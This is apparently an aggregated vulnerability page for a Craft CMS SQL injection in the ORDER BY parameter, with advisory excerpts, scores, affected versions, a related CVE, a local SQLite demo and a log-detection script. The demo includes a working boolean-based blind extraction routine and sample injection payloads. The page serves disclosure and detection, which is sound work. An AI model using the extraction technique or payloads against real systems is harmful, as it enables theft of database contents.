CVE-2026-25495
Published 2026-02-09
Priority P2 · 61 · High · CVSS 3.1 base score 8.8
Vector AV:N / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H
EPSS 0.50% (39.1st percentile)
Craft is a platform for creating digital experiences. In Craft versions 4.0.0-RC1 through 4.16.17 and 5.0.0-RC1 through 5.8.21, the element-indexes/get-elements endpoint is vulnerable to SQL Injection via the criteria[orderBy] parameter (JSON body). The application fails to sanitize this input before using it in the database query. An attacker with Control Panel access can inject arbitrary SQL into the ORDER BY clause by omitting viewState[order] (or setting both to the same payload). This issue is patched in versions 4.16.18 and 5.8.22.
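The mechanics behind the description above (a client-supplied string dropped into ORDER BY, where an expression is evaluated once per row and can therefore serve as an oracle), together with the boolean-based blind extraction via `criteria[where]`/`criteria[orderBy]` described in the CVE-2026-31858 entry further down, reduced to an added, stand-alone Python/SQLite example. This is not Craft's code: the `elements` and `users` tables, the `get_elements_*` functions and the column allowlist are constructed for illustration, and because SQLite has no `SLEEP()` the oracle is boolean-based (sort direction flips when the injected condition holds) rather than time-based.

```python
import re
import sqlite3
from typing import List


def make_db() -> sqlite3.Connection:
    """Constructed schema and rows; stands in for an element index plus a users table."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE elements (id INTEGER PRIMARY KEY, title TEXT, dateCreated TEXT);
        INSERT INTO elements VALUES (1, 'About', '2026-01-01');
        INSERT INTO elements VALUES (2, 'Blog', '2026-01-02');
        INSERT INTO elements VALUES (3, 'Contact', '2026-01-03');
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', '$2y$13$hypothetical-bcrypt-hash');
        """
    )
    return db


def get_elements_vulnerable(db: sqlite3.Connection, order_by: str) -> List[int]:
    """Vulnerable shape: the client-supplied orderBy string is interpolated into ORDER BY."""
    rows = db.execute(f"SELECT id FROM elements ORDER BY {order_by}").fetchall()
    return [r[0] for r in rows]


ALLOWED_COLUMNS = {"id", "title", "dateCreated"}  # illustrative allowlist, not Craft's
_ORDER_RE = re.compile(r"^\s*([A-Za-z_][A-Za-z0-9_]*)(?:\s+(asc|desc))?\s*$", re.IGNORECASE)


def get_elements_hardened(db: sqlite3.Connection, order_by: str) -> List[int]:
    """Hardened shape: orderBy must be an allowlisted column plus an optional direction."""
    m = _ORDER_RE.match(order_by)
    if not m or m.group(1) not in ALLOWED_COLUMNS:
        raise ValueError(f"rejected orderBy: {order_by!r}")
    direction = (m.group(2) or "asc").upper()
    rows = db.execute(f'SELECT id FROM elements ORDER BY "{m.group(1)}" {direction}').fetchall()
    return [r[0] for r in rows]


def is_rejected(db: sqlite3.Connection, order_by: str) -> bool:
    """True when the hardened path refuses the orderBy value."""
    try:
        get_elements_hardened(db, order_by)
    except ValueError:
        return True
    return False


def blind_payload(condition: str) -> str:
    """ORDER BY is evaluated for every row, so a CASE on an arbitrary subquery flips
    the sort order when `condition` is true. A time-based variant (SLEEP(1) on MySQL)
    behaves the same way: one evaluation per row, hence the per-row delay."""
    return f"(CASE WHEN ({condition}) THEN -id ELSE id END)"


def oracle(db: sqlite3.Connection, condition: str) -> bool:
    """True when the injected condition held: the rows come back descending."""
    return get_elements_vulnerable(db, blind_payload(condition)) == [3, 2, 1]


def extract_username(db: sqlite3.Connection, user_id: int = 1, max_len: int = 32) -> str:
    """Boolean-based blind extraction of users.username, one character per position."""
    charset = "abcdefghijklmnopqrstuvwxyz0123456789_-."
    out = ""
    for pos in range(1, max_len + 1):
        hit = None
        for ch in charset:
            cond = f"(SELECT substr(username,{pos},1) FROM users WHERE id={user_id})='{ch}'"
            if oracle(db, cond):
                hit = ch
                break
        if hit is None:
            break  # past the end of the string: substr() returns ''
        out += hit
    return out


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, blind extraction:", extract_username(db))  # admin
    print("hardened rejects payload:", is_rejected(db, blind_payload("1=1")))  # True
```

The hardened variant treats `orderBy` as a column name plus direction and never as SQL; anything outside the allowlist is refused before a query is built. The advisory text describes Craft's own fix only as removing the client value (the `unset()` mentioned in the CVE-2026-31858 entry), so the allowlist here is this example's choice, not the project's.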
Affected (8 ranges; a dash means the source lists no version bound; the `>= 5.0.1 < 5.9.9` row matches the 5.9.9 fix release cited for the related CVE-2026-31858 entry below)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| craftcms | cms | — | — |
| craftcms | cms | >= 4.0.0-RC1 < 4.16.18 | 4.16.18 |
| craftcms | cms | >= 5.0.0-RC1 < 5.8.22 | 5.8.22 |
| craftcms | craft_cms | < 4.16.18 | 4.16.18 |
| craftcms | craft_cms | < 5.8.22 | 5.8.22 |
| craftcms | craft_cms | — | — |
| craftcms | craft_cms | — | — |
| craftcms | craft_cms | >= 5.0.1 < 5.9.9 | 5.9.9 |
Detection & IOCs (extracted from sources)
- Monitor POST requests to the `element-indexes/get-elements` endpoint for JSON bodies containing a `criteria[orderBy]` parameter, especially those omitting `viewState[order]` or setting both to the same value; either shape indicates an attempt to inject into the ORDER BY clause.
- The same `criteria[orderBy]` vector also applies to the `ElementSearchController::actionSearch()` endpoint (CVE-2026-31858), which did not receive the fix applied to `ElementIndexesController`; monitor both endpoints.
- Watch for boolean-based blind SQL injection patterns in `criteria[where]`, `criteria[orderBy]`, or other query properties submitted to Craft CMS Control Panel endpoints by any authenticated user.
- Exploitation requires an authenticated Control Panel user, not an unauthenticated attacker; scope detection rules to authenticated sessions targeting the affected endpoints.
- CVE-2026-31858 likewise needs only an authenticated Control Panel user (no admin role), so the same privilege scope applies to both issues.
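The monitoring criteria in the list above, as an added Python example that is not taken from any of the page's sources or from a vendor rule: it parses constructed JSON-lines request records (a made-up format with `ts`, `user`, `method`, `path` and `body` fields), keeps POSTs whose path contains the `element-indexes/get-elements` action, and flags the three shapes the list describes: `criteria[orderBy]` without `viewState[order]`, both set to the same value, and an `orderBy` that is not a plain column/direction list, plus any client-supplied `criteria[where]`. The `/admin/actions/` path prefix and the log fields are assumptions; the search controller's route is not given on this page, so `WATCHED_ACTIONS` lists only the one named action.

```python
import json
import re
from dataclasses import dataclass, field
from typing import Any, Dict, List, Optional

# Action names to watch. Only the element-indexes action is named on this page;
# the ElementSearchController::actionSearch() route is not, so add it here once
# confirmed for your Craft version (assumption, not taken from the advisory).
WATCHED_ACTIONS = ("element-indexes/get-elements",)

# What a benign orderBy looks like: column (optionally table.column) plus an optional
# direction, comma-separated. Parentheses, SELECT, SLEEP and the like never match.
_IDENT = r"[A-Za-z_][A-Za-z0-9_.]*"
SAFE_ORDER_RE = re.compile(
    rf"^\s*{_IDENT}(?:\s+(?:asc|desc))?(?:\s*,\s*{_IDENT}(?:\s+(?:asc|desc))?)*\s*$",
    re.IGNORECASE,
)


@dataclass
class Finding:
    ts: str
    user: str
    reasons: List[str] = field(default_factory=list)


def param(body: Dict[str, Any], outer: str, inner: str) -> Any:
    """Read outer[inner] from either a nested JSON object or a flat bracket key."""
    nested = body.get(outer)
    if isinstance(nested, dict) and inner in nested:
        return nested[inner]
    return body.get(f"{outer}[{inner}]")


def analyse(record: Dict[str, Any]) -> Optional[Finding]:
    """Apply the detection criteria to one request record; None means nothing to report."""
    if record.get("method") != "POST":
        return None
    if not any(action in record.get("path", "") for action in WATCHED_ACTIONS):
        return None
    try:
        body = json.loads(record.get("body") or "{}")
    except json.JSONDecodeError:
        return None  # malformed body: out of scope for this rule
    if not isinstance(body, dict):
        return None

    reasons: List[str] = []
    order_by = param(body, "criteria", "orderBy")
    if order_by is not None:
        view_order = param(body, "viewState", "order")
        if view_order is None:
            reasons.append("criteria[orderBy] sent without viewState[order]")
        elif view_order == order_by:
            reasons.append("viewState[order] equals criteria[orderBy]")
        if not isinstance(order_by, str) or not SAFE_ORDER_RE.match(order_by):
            reasons.append("criteria[orderBy] is not a plain column/direction list")
    if param(body, "criteria", "where") is not None:
        reasons.append("client-supplied criteria[where]")
    if not reasons:
        return None
    return Finding(ts=record.get("ts", ""), user=record.get("user", "?"), reasons=reasons)


def scan(lines: List[str]) -> List[Finding]:
    """Run analyse() over JSON-lines request records, skipping blank lines."""
    findings: List[Finding] = []
    for line in lines:
        line = line.strip()
        if line:
            finding = analyse(json.loads(line))
            if finding:
                findings.append(finding)
    return findings


# Constructed sample records (not real Craft logs); the path form is an assumption.
_GET_ELEMENTS = "/admin/actions/element-indexes/get-elements"
SAMPLE_LOG = [json.dumps(r) for r in [
    {"ts": "2026-02-10T09:00:01Z", "user": "editor", "method": "POST", "path": _GET_ELEMENTS,
     "body": json.dumps({"criteria": {"orderBy": "dateCreated desc"},
                         "viewState": {"order": "dateCreated", "sort": "desc"}})},
    {"ts": "2026-02-10T09:00:07Z", "user": "mallory", "method": "POST", "path": _GET_ELEMENTS,
     "body": json.dumps({"criteria": {"orderBy": "(CASE WHEN (SELECT 1)=1 THEN id ELSE title END)"}})},
    {"ts": "2026-02-10T09:00:09Z", "user": "mallory", "method": "POST", "path": _GET_ELEMENTS,
     "body": json.dumps({"criteria": {"orderBy": "(SELECT SLEEP(1))"},
                         "viewState": {"order": "(SELECT SLEEP(1))"}})},
    {"ts": "2026-02-10T09:01:15Z", "user": "trent", "method": "POST", "path": _GET_ELEMENTS,
     "body": json.dumps({"criteria[where]": "1=1", "viewState[order]": "id"})},
    {"ts": "2026-02-10T09:02:00Z", "user": "editor", "method": "GET", "path": "/admin/entries", "body": ""},
]]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f.ts, f.user, "; ".join(f.reasons))
```

The benign first record (ordinary `dateCreated desc` with a matching `viewState`) produces no finding; the two `mallory` requests each trigger two reasons, and the `criteria[where]` request one. Authentication scoping is left to the log source: the rule assumes `user` is only populated for authenticated Control Panel sessions.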
CVSS provenance
NVD · v3.1 · 8.8 HIGH · CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
NVD · v4.0 · 8.7 HIGH · CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
GHSA
Craft CMS Vulnerable to SQL Injection in Element Indexes via `criteria[orderBy]`
ghsa · 2026-02-09 · CVE-2026-25495 · HIGH · CWE-89
## Summary
The `element-indexes/get-elements` endpoint is vulnerable to **SQL Injection** via the `criteria[orderBy]` parameter (JSON body). The application fails to sanitize this input before using it in the database query.
An attacker with **Control Panel access** can inject arbitrary SQL into the `ORDER BY` clause by omitting `viewState[order]` (or setting both to the same payload).
> [!NOTE]
> The `ORDER BY` clause executes per row. `SLEEP(1)` on 10 rows = 10s delay.
---
## PoC
### Required Permissions
- Access to the Control Panel
### Steps to reproduce
1. Log in to the control panel
2. Navigate to any element index (e.g., **Users** `/admin/users`, **Entries**, **Assets**, etc.)
3. Intercept the `PO
OSV
Craft CMS Vulnerable to SQL Injection in Element Indexes via `criteria[orderBy]`
osv · 2026-02-09 · CVE-2026-25495 · HIGH (same advisory text as the GHSA entry above)
No detection rules found.
No public exploits indexed.
Wiz
CVE-2026-25495 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 8.7 · HIGH
## CVE-2026-25495: PHP vulnerability analysis and mitigation
(Description identical to the NVD text at the top of this page.)
Source: NVD
Score: 8.7 (CNA)
Published: February 9, 2026
Severity: HIGH
Affected technologies: PHP, Craft CMS
Has public exploit: Yes
Has CISA KEV exploit: No
CISA KEV Relea
Wiz
CVE-2026-31858 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 8.7 · HIGH
## CVE-2026-31858: PHP vulnerability analysis and mitigation
Craft is a content management system (CMS). The ElementSearchController::actionSearch() endpoint is missing the unset() protection that was added to ElementIndexesController in CVE-2026-25495. The exact same SQL injection vulnerability (including criteria[orderBy], the original advisory vector) works on this controller because the fix was never applied to it. Any authenticated control panel user (no admin required) can inject arbitrary SQL via criteria[where], criteria[orderBy], or other query properties, and extract the full database contents via boolean-based blind injection. Users should update to the patched 5.9.9 release to mitigate the issue.
Source: NVD
Score: 8.7 (CNA)
Published: March 11, 2026
Severity: HIGH
CNA Sc